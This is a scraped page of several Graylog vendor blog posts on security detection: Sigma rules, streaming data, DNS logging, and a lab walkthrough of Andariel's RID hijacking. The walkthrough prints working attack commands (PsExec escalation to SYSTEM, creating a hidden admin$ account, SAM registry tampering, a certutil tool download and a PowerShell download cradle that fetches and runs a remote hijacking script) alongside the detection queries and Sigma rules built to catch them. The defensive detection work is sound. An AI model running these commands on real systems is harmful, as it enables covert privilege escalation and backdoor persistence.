Skip to content

The Ultimate Guide to Sigma Rules

In cybersecurity as in sports, teamwork makes the dream work. In a world where security analysts can feel constantly bombarded by threat actors, banding together to share information and strategies is increasingly important. Over the last few years, security operations center (SOC) analysts started sharing open source Sigma rules to create and share detections that help them level the playing field.

By understanding what Sigma rules are and how to use them, you can leverage their capabilities, optimizing your centralized log management solution for security detection and response.

What are Sigma Rules?

Introduced in 2017 by detection engineer Florian Roth and open-source security tool developer Thomas Patzke, Sigma is a text-based, generic, open signature format that analysts can use to describe log events, making detections easier to write.  Since Sigma uses YAML, it has a human-readable syntax that means people can easily read and understand the detection rules.

As a generic detection rule format, Sigma creates a common shared language for defenders, overcoming the challenges that they face trying to write rules in proprietary Security Information and Event Management (SIEM) platforms. Security analysts can share rules using the Sigma format, then convert them into the SIEM-specific language.

Similar to how YARA rules use Indicators of Compromise (IoC) to help identify and classify malware files, Sigma rules match criteria to log events to help detect incidents. Sigma rules can contain any or all of the following fields:

  • Title
  • Status, like experimental or tested
  • Description of what it detects
  • Author name
  • Date
  • ID
  • License, assuming the author shares the rule
  • Level
  • Data or log source
  • Set of conditions
  • Tag, including MITRE ATT&CK mapping

 

Why use Sigma Rules?

With Sigma rules, security analysts can collaborate more effectively and efficiently.

Standardization

Sigma standardizes detection rule formats across all SIEM and log management platforms. Since each rule contains the same fields in the same order, security analysts can use a converter that translates the open-source detection into the format that their security system uses.

Collaboration

For defenders, collaboration is a fundamental benefit. Until Sigma rules, security analysts could only share detections with other people who use the same SIEM or log management system. With open-source Sigma rules, defenders can share tested and untested rules within GitHub to build stronger detections.

Further, by collaborating, defenders can share knowledge. With people across all experience levels sharing detections, security analysts can bridge the cybersecurity skills gap, enhancing everyone’s security.

Flexibility

From a business perspective, Sigma rules give companies a way to evolve their cybersecurity technology stack in a way that makes sense for them. The ability to convert the rules to a vendor’s format means that security teams can shift from one technology to another more easily, avoiding costly vendor lock-in or enabling them to mature their operations as necessary.

Sigma Rule Use Cases

With Sigma, you can uplevel your security in proactive and reactive ways.

Suspicious Activity Alerts

To improve your reactive security, you can build Sigma rules to detect suspicious activity. Using the activity that your log data captures, you can build rules that detect almost anything, including:

  • Unauthorized actions
  • Web/resource access
  • File modification
  • Process creation

 

As you get more comfortable building detection rules, you can correlate more log data for meaningful, high-fidelity alerts.

Threat Hunting

Once you have a set of robust alerts, you can start using Sigma rules to mature your proactive security monitoring, too. With a centralized log management solution aggregating old log data, you can build Sigma detections based on threat intelligence and proactively search for activity indicating attackers hiding in your systems.

The Anatomy of a Sigma Rule

Writing Sigma rules doesn’t need to be hard, but the more correlations you build into the rule, the more difficult writing it becomes.

An example of a short Sigma rule is the one that identifies potential brute force or credential theft attacks.


a sigma rule
Azure Account Lockout Sigma Rule

Identify Use Case

The first step to building a Sigma rule is deciding what activity you need to find.

In the example detection, the authors define the use case in the tags as an attack at the credential and access level.

They also map this activity to the MITRE ATT&CK Technique T1110 which covers:

  • Password guessing (T1110.001)
  • Password cracking (T1110.002)
  • Password spraying (T1110.003)
  • Credential stuffing (T1110.004)

Determine Log Source/Data Source

Since your Sigma rule relies on log data, you need to identify what sources apply. When writing the rule, you may want to include both the product and the service.

Breaking down the example detection, you can see that the logsource in this case is the Azure sign-in logs:


Define the Detection

As you continue to build your rule, you also dig deeper into the logsource data. When you define the detection, you look at the log fields that alert you to specific activity.

In this example, the sign-in logs for “Azure AD authentication error 50053”:

Set the Condition

When you set the condition, you define what the rule “looks for” in the defined log.

In this case, since the log needs to have the required error, you set it as follows:

Additional Fields and Complexity

Although valuable, this example is a fairly simple rule. As you try to reduce noise across your monitoring environment, you may incorporate additional information, like:

  • More than one log source
  • More than one detection
  • Filters
  • Multiple conditions
  • Indicators of false positives

 

A good example of a more complex Sigma rule is the Sign-In Failure for Bad Password Threshold:


A Sigma Rule
Azure Sign-In Failure Bad Password Threshold

Graylog Security: Sigma Rule Event Processor for Advanced Detection Capabilities

With Graylog Security, you get the security functionality of SIEM and the intuitive user interface that makes managing security faster. With our Sigma Rule Event Processor, you can import rules you want to use directly from GitHub, and we automatically associate it with an event definition or customize the definition, giving you a way to rapidly mature your detection capabilities.


By combining Sigma rules with Graylog’s lightning-fast speed, you can create the high-fidelity alerts you need and investigate them rapidly, improving key metrics like Mean Time To Detect (MTTD) and Mean Time To Resolve (MTTR).

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users

Researchers at AhnLab Security Intelligence Center (ASEC) recently published a report on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, that has been leveraging RID hijacking and user account concealment techniques in its operations to stealthily maintain privileged access to compromised Windows systems.

 

This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel’s attack chain, and how Graylog Security can be used to detect and analyze similar activity in an organization’s network.

 

What is RID Hijacking?

The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user’s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.

RID hijacking is a technique discovered by Sebastian Castro that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.

This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.

However, there is a caveat to the technique – it requires SYSTEM level privileges to access and modify user information in the SAM, which resides in a protected registry key.

 

Attack Demonstration

According to the report from AhnLab, the threat actor’s RID hijacking process consists of the following stages. We’ll use this model as we walk through the attack in a lab environment.

RID Attack Demonstration

The RID Hijacking attack process referenced from AhnLab

 

Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.

 

System, Security, and PowerShell/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.

 

Stage 1: SYSTEM Privilege Escalation

 

We’ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft Sysinternals tool often abused by adversaries for lateral movement and privilege escalation. We’ll spawn a PowerShell session using PsExec with the -s argument:

 

PsExec.exe -s -i powershell.exe

 

The output of whoami /user in the shell confirms that we’re now running as SYSTEM.

Whoami Output  

In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.

Command Executed  

Stage 2: Create User Account

 

Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:

net user admin$ admin@123 /add
net localgroup “Remote Desktop Users” “admin$” /add
net localgroup “Administrators” “admin$” /add

 

The trick to hiding the user here is the $ at the end of the username. It’s an old school technique that imitates computer accounts which are hidden from some user listing options – note that the newly created user isn’t shown in the output of net user.

net user

In Graylog we see the commands as event ID 4688 labeled as “process started”, and additional labels for 4720 “account created” and 4732 “group member added”.

ID 4688 and 4720

 

Stage 3: Modify the RID Value in Registry

 

Before demonstrating the RID hijack, let’s see what the current RID value and permissions are for the user admin$. We’ll open a separate command prompt and spawn a shell as that user using runas:

runas /user:admin$ cmd

 

Then, execute whoami commands in that shell. As shown, the user’s current RID is 1009 and its privileges are limited as expected for a standard user.

RID Value

Well, as the chefs say, elevate it!

 

Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.

 

User information is stored in the SAM hive in unique subkeys under:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

 

Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we’re looking at the key 000003F1.

Hex Value

Within key 000003F1 the actual RID can be found in the value F which contains binary data. As highlighted, the RID value is located at offset 30 and stored in little-endian format.

SAM Key

To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.

Hex Key Value

 

 

With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami /user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami /priv  shows that the user has been granted admin privileges.

RID 500

We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:

NOT user_name:administrator AND user_id:/.*\-500/

Administrator user 500

This query might result in false positives if the administrator account is renamed. We can further specify it to target both RID hijacking and user accounts mimicking machine names.

user_name:/.*\$/ AND user_id:/.*\-500/

 

Custom and Open-source Tooling

AhnLab Report

Manually altering SAM user information in the registry editor is good for demonstration, but it isn’t necessarily what threat actors are doing.

 

The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on GitHub.

 

AhnLab breaks down the differences between the tools quite well in its report:

AhnLab Report
Differences in tool behavior referenced from AhnLab

 

 

CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.

 

 

Let’s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX packed variant to the Windows host.

 

certutil.exe -urlcache -split -f https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe

 

The command line arguments require the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we’re again creating the user admin$ and targeting the local admin RID.

CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator

Create Hidden Account

 

The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.

Regini Being Used

Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we see the tool deleting the hidden user then silently importing a .reg file using regedit. What’s happening here is that the tool already populated the import file with information from the user registry key before it was deleted, and modified the RID in the file to match Administrator’s. This is an additional step to hide the created user as once the registry key is restored, the user becomes hidden from additional user list interfaces.

Enumeration Events

Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.

Tool Execution

This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection – while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.

 

Nonetheless, it’s useful in a threat hunt or to detect the vanilla tool. We can use the following query:

process_command_line:(/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\.ini/ OR /.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\.reg/)

Process Command Line

 

The tool by itself doesn’t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some damning results.

VirusTotal

 

Further Attempts to Hide Users

 

In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we’ll carry out the technique separately and see what can be gleaned from the logs.

 

As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch and execute in-memory a RID hijacking script from GitHub. This leaves us with the account given administrator privileges without further action to conceal it.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/r4wd3r/RID-Hijacking/master/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500

Powershell Script Run

 

Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.

Fake Computer Name

Even with the fake computer name, the hidden user still shows up in Computer Management.

Computer Fake Name

 

Following along with the Andariel threat group’s tool methods, we run commands to:

 

A) Fetch the hidden user’s RID

Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID

 

B) Export the hidden user’s associated registry keys in the SAM hive

reg export hklm\sam\sam\domains\account\users\names\admin$ names.reg
reg export hklm\sam\sam\domains\account\users\0000XXXX users.reg

 

C) Delete the user

net user admin$ /delete

 

D) Restore the user by importing the registry files containing the user keys information

reg import names.reg
reg import users.reg

 

By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.

No Admin User Shown

 

Every step of the execution can be seen in Graylog.

Attack Steps Log

 

Detections

 

We’ve provided Sigma rules below to detect the following aspects of the attack chain:

 

  • Hidden user account with Administrator RID
  • RID hijacking via CreateHiddenAccount
  • Export of SAM users registry keys via reg.exe

 

With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.

 

The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.

Sigma Rule Added

Rule #1

title: Illuminate - Hidden User Account With Administrator RID
id: 531bfab7-d18c-4f51-bae0-64cf38cae3d5
status: experimental
description: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
detection:
    selection_event:
        EventID: 4672
    selection_name:
        SubjectUserName|endswith: '$'
    selection_rid:
        SubjectUserSid|endswith: '-500'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Rule #2

title: Illuminate - RID Hijacking Via CreateHiddenAccount
id: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b
status: experimental
description: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking
references:
    - https://github.com/wgpsec/CreateHiddenAccount/
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini
            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg
    condition: selection
falsepositives:
    - Unknown
level: high

Rule #3

title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe
id: 0709625a-4703-47ba-acfd-3beaa4d0f1dc
status: experimental
description: Detects export of SAM user account information via reg export
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.credential_access
    - attack.t1003.002
    - attack.persistence
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'export'
            - 'hklm\sam\sam\domains\account\users\'
    condition: selection
falsepositives:
    - Administrative scripts or forensic investigations
level: high

Graylog  Detections

Graylog has provided the Sigma Rules here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, and Dashboards, and other content to meet various security use cases. For more about Sigma Rules, see our recent blog “The Ultimate Guide to Sigma Rules

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Using Streaming Data for Cybersecurity

After a long day, you sit down on the couch to watch your favorite episode of I Love Lucy on your chosen streaming platform. You decide on the episode where Lucy can’t keep up with the chocolates on the conveyor belt at the factory where she works. Without realizing it, you’re actually watching an explanation of how the streaming platform – and your security analytics tool – work.

 

Data streaming is the real-time processing and delivery of data. Just like those chocolates coming through on the conveyor belt, your security analytics and monitoring solution collects, parses, and normalizes data so that you can use it to understand your IT environment and potential threats to your security.

 

Using streaming data for cybersecurity may present some challenges, but it also drives the analytics models that allow you to improve your threat detection and incident response program.

What is streaming data?

Streaming data is a continuous flow of information processed in real-time that businesses can use to gain insights immediately. Since the data typically appears chronological order, organizations can apply analytics models to identify or predict changes.

 

The key characteristics of streaming data include:

  • Continuous flow: non-stop real-time data processed as it arrives
  • Sequential order: data elements in chronological order for consistency
  • Timeliness: rapid access for time-sensitive decision-making and activity

 

Continuous streaming data enables security professionals to detect patterns and identify anomalies that may indicate a potential threat or incident. Most security telemetry is streaming data, like:

  • Access logs
  • Web application logs
  • Network traffic logs

 

Streaming Data vs. Static Data

Streaming data and static data differ significantly in their characteristics and applications. While static data is fixed and collected at a single point in time, streaming data is continuous and time-sensitive, containing timestamps.

Timeliness

When using data for security use cases, timeliness is a key differentiator:

  • Static data: fixed, point-in-time snapshot
  • Streaming data: continuous, real-time, no defined end

Sources

For security professionals, this difference is often the one that makes managing and using security data challenging:

  • Static data: typically fewer, defined sources
  • Streaming data: large numbers of diverse geographic locations and technologies

Format

When managing security telemetry, format is often the most challenging difference that you need to manage:

  • Static data: uniform and structured
  • Streaming data: various formats, including structured, unstructured, and semi-structured

Analytics Use

The key difference that matters for security teams is how to use the data with analytics models:

  • Static data: mostly historical insights
  • Streaming data: predictive analytics and anomaly detection

 

What are the major components of a stream processor?

With a data stream processor, you can get timeline insights by analyzing and visualizing your security data.

Data stream management

Data stream management involves data storage, process, analysis, and integration so that you generate visualizations and reports. Typically, these technologies have:

  • Data source layer: captures and parses data
  • Data ingestion layer: handles the flow of data between source and processing layers
  • Processing layer: filters, transforms, aggregates, and enriches data by detecting patterns
  • Storage layer: ensures data durability and availability
  • Querying layer: tools for asking questions and analyzing stored data
  • Visualization and reporting layer: performs visualizations like charts and graphs to help generate reports
  • Integration layer: connects with other technologies

Complex event processing

Complex event processing identifies meaningful patterns or anomalies within the data streams. The components of complex event processing include:

  • Event Detection: Identifies significant occurrences within IoT data streams.
  • Insight Extraction: Derives actionable information from detected events.
  • Rapid Transmission: Ensures swift communication to higher layers for real-time action.

These functionalities are critical for real-time analysis, threat detection, and response.

Data collection and aggregation

Data collection and aggregation organizes the incoming data, normalizing it so that you can correlate various sources to extract insights. Real-time data analysis through streaming enhances an organization’s ability to detect and respond to cyber threats promptly, improving overall security postures. Continuous monitoring and strong security measures are pivotal to protect data integrity during transit.

Continuous logic processing

Continual logic processing underpins the core of stream processing architecture by executing queries on incoming data streams to generate useful insights. This subsystem is crucial for real-time data analysis, ensuring prompt insights essential for maintaining vigilance against potential cybersecurity threats.

 

What are the data streaming and processing challenges with cybersecurity telemetry?

Data streaming and processing come with several challenges for cybersecurity teams who deal with data heterogeneity that impacts their ability to detect and investigate incidents.

Data Volume and Diversity

Modern IT environments generate high volumes of data in disparate formats. For example, security analysts often struggle with the different formats across their logs, like:

Chronological order

Data streams enable you to use real-time data to promptly identify anomalies or detect security incidents. However, as the data streams in, you need to ensure that you can organize it chronologically, especially when you need to write your security incident report.

Scalability

The increasing volume of stream data necessitates that processing systems adapt dynamically to varying loads to maintain quality. For example, you may need to scale up your analytics – and therefore data processing requirements – when engaging in an investigation.

 

Benefits of data streaming and processing for cybersecurity teams

When you use real-time data streaming, you can move toward a proactive approach to cybersecurity, enabling real-time detections and faster incident response. Utilizing Data Pipeline Management can help you also save costs when routing data where you want it.

 

Infrastructure Cost Reduction

When you use streaming data, you can build a security data lake strategy that involves data tiering. You can reduce the total cost of ownership by optimizing the balance of storage costs and system performance. For example, you could have the following three tiers of data:

  • Hot: data needed immediately for real-time detections
  • Warm: data stored temporarily in case you need it to investigate an alert
  • Cold: long term data storage for historical data or to meet a retention compliance requirement

When you can store cold data in a cheaper location, like an S3 bucket, you reduce overall costs.

 

 

Improve Detections

Streaming data enables you to parse, normalize, aggregate, and correlate log information from across your IT environment. When you use real-time data, you can detect threats faster, enabling you to mitigate the damage an attacker can do. The aggregation and correlation capabilities enable you to create high-fidelity alerts so you can focus on the potential threats that matter to your systems, networks, and data. Additionally, since streaming data is already processed, you can enrich and integrate it with:

Apply Security Analytics

Security analytics are analytics models focused on cybersecurity use cases, like:

  • Security hygiene: how well your current controls work
  • Security operations: anomaly detection, like identifying abnormal user behavior
  • Compliance: identifying security trends like high severity alerts by source, type, user, or product

For example, anomaly detection analytics identify behaviors within data that do not conform to expected norms, enabling you to prevent or detect unauthorized access or potential data exfiltration attempts.

 

Graylog Security: Real-time data for improved threat detection and incident response

Graylog Enterprise and Security ensures scalability as your data grows to reduce total cost of ownership (TCO). Our platform’s innovative data tiering using data pipeline management capability facilitates efficient data storage management by automatically organizing data to optimize access and minimize costs without compromising performance.

 

With frequently accessed data kept on high-performance systems and less active data in more cost-effective storage solutions, you can leverage Graylog Security’s built-in content to uplevel your threat detection and response (TDIR) processes. Our solution combines MITRE ATT&CK’s knowledge base of adversary behavior and vendor-agnostic sigma rules so you can rapidly respond to incidents, improving key cybersecurity metrics. By combining the power of MITRE ATT&CK and sigma rules, you can spend less time developing custom cyber content and more time focusing on more critical tasks.

 

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

DNS Security Best Practices for Logging

Your Domain Name System (DNS) infrastructure enables users to connect to web-based resources by translating everyday language into IP addresses. Imagine going into a restaurant, in the age before the internet, only to find that the staff speaks and the menu is written in a different language from yours. Without some shared communication form, you can’t order dinner, and they can’t give you what you want. Finally, someone comes into the restaurant who speaks both languages, acting as the translator so you can get the service you need.

 

A DNS infrastructure is the translator for cloud-based operations for continued services. However, when malicious actors target your DNS, a successful attack can lead to downtime or a data breach.

 

To mitigate risk, you should implement some DNS security best practices, including knowing what logs help you monitor for and detect a potential incident.

 

What is DNS security?

DNS security refers to the measures taken to protect the Domain Name System (DNS) infrastructure from cyber attacks. DNS translates a human-readable URL (Uniform Resource Locator) into a machine-readable IP address, routing user requests to the appropriate digital resources.

 

Cyber attacks against the DNS infrastructure can lead to:

  • Website defacement
  • Traffic hijacking sending users to malicious websites or intercepting communications
  • Unauthorized access to sensitive information
  • Distributed Denial of Service (DDoS) attacks causing service outages and business interruption

 

DNS security controls typically include:

  • Redundancy: Using multiple DNS servers spread across different locations to prevent a single point of failure
  • DNS Security Extensions (DNSSEC): Protocols providing authentication and data integrity
  • DNS logging: Monitoring for and detecting malicious activities

 

Why is DNS security important?

The history of DNS gives insight into why it is not a secure technology. Originally created in 1983 so people could more easily navigate the nascent internet, no one predicted this new connectivity would change and become critical to daily operations.

Your DNS infrastructure acts as the foundation for your digital business operations meaning the service disruptions lead to downtime and lost revenue.

 

A successful attack against your DNS infrastructure can lead to:

  • Business disruption: Without the ability to translate URLs into IP addresses, users and customers cannot connect to digital services.
  • Lost revenue: Without the ability to connect to services, customers cannot engage in transactions, like being able to purchase items in an e-commerce store.
  • Data breach: Compromising DNS services can lead to unauthorized data transfers, modification, or access that impact sensitive data’s integrity and privacy.
  • Compliance risk: DNS is included in various compliance frameworks and mandates, including the Payment Card Industry Data Security Standard (PCI DSS) and International Organization for Standardization (ISO) 27002-2022

 

6 DNS Attack Types and How to Prevent Them

As attackers increasingly target the DNS infrastructure, knowing these four common attack types can help you implement security controls and the appropriate monitoring to mitigate risk.

 

DoS and DDoS

Many attacks against the DNS infrastructure fall into these categories, even if they use different methodologies for achieving the objective. Although similar, you should understand the following differences:

  • Denial of Service (DoS): one computer using one internet connection sends high volumes of traffic to a remote server
  • Distributed Denial of Service (DDoS): multiple devices across multiple internet connections target a resource, often using a botnet consisting of devices infected with malware

 

These attacks flood a DNS server with requests and traffic. As the server attempts to manage the responses, it becomes overloaded and shuts down.

 

DNS amplification attacks

One DDoS attack type is DNS amplification, in which malicious actors send high volumes of DNS name lookup requests to publicly accessible, open DNS servers. Instead of using their own IP in the source address, the attackers spoof the target’s address so that the DNS server responds to the target.

 

DNS hijacking

In a DNS hijacking attack, malicious actors make unauthorized changes to the DNS settings which redirect users to deceptive or malicious websites. Some varieties of DNS hijacking attack include:

  • Cache poisoning: inserting false data into the DNS server’s cache to redirect users when they try to access the website
  • Server hijacking: gaining unauthorized access to a domain’s DNS records and changing A or AAAA records that redirect users to a malicious IP address or attacker-controlled server

 

DNS Spoofing

DNS spoofing, also called DNS poisoning, exploits security gaps in the DNS protocol. The attacker gets in between the browser and the DNS server to supply the wrong response, diverting traffic to the malicious website.

 

DNS tunneling

DNS tunneling is a sophisticated attack where malicious actors insert data into the communication path between the browser and server. This enables them to bypass several defensive technologies, including:

  • Filters
  • Firewalls
  • Packet capture

 

This process routes queries to a command and control (C2) server, enabling them to steal information.

 

DNS Logging Best Practices for Improved Security

Whether you build your own DNS infrastructure or use a managed service, you should be integrating your DNS logs into your overarching security monitoring. While the logs should provide similar information, the field used changes based on your DNS server’s manufacturer. However, you should look for log fields supporting the following categories and event types.

Cloudflare Graphic Reference

Zone operations

In DNS-speak, the zone refers to the domain. Some data you should consider collecting include log fields related to the creation, deletion, or modification to:

  • Zones
  • Records
  • Nodes

 

DNS Security Extensions (DNSSEC)

DNSSEC are configurations that use digital signatures to authenticate DNS queries and responses. Some data you should consider collecting include log fields related to:

  • Addition of new keys or trust points
  • Removal of keys or trust points
  • Exports of metadata

 

Policies

DNS policies allow you to

  • Balance traffic loads
  • Assign DNS clients based on geographic location
  • Create zones
  • Manage query filters
  • Redirect malicious DNS requests to a non-existent IP address

 

Some data you should consider collecting include log fields related to the creation, deletion, or modification of:

  • Client subnet records
  • Server level policies
  • Forwarding policies
  • Zone policies

 

Graylog Security: Correlating DNS Log Events

DNS logs are often difficult to parse, sometimes creating a blind spot when monitoring DNS security. Graylog Security offers out-of-the-box content that streamlines this process with pre-built content to rapidly set up and start monitoring your DNS security.

Our prebuilt content to map security events to MITRE ATT&CK. By combining Sigma rules and MITRE ATT&CK, you can create high-fidelity alerting rules that enable robust threat detection, lightning-fast investigations, and streamlined threat hunting. For example, with Graylog’s security analytics, you can monitor user activity for anomalous behavior indicating a potential security incident. By mapping this activity to the MITRE ATT&CK Framework, you can detect and investigate adversary attempts at using Valid Accounts to gain Initial Access, mitigating risk by isolating compromised accounts earlier in the attack path and reducing impact.

Graylog’s risk scoring capabilities enable you to streamline your threat detection and incident response (TDIR) by aggregating and correlating the severity of the log message and event definitions with the associated asset, reducing alert fatigue and allowing security teams to focus on high-value, high-risk issues.

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Centralized Log Management for the Digital Operational Resilience Act (DORA)

The financial services industry has been a threat actor target since before digital transformation was even a term. Further, the financial services organizations find themselves continuously under scrutiny. As members of a highly regulated industry, these companies need to comply with various laws to ensure that they effectively protect sensitive data.

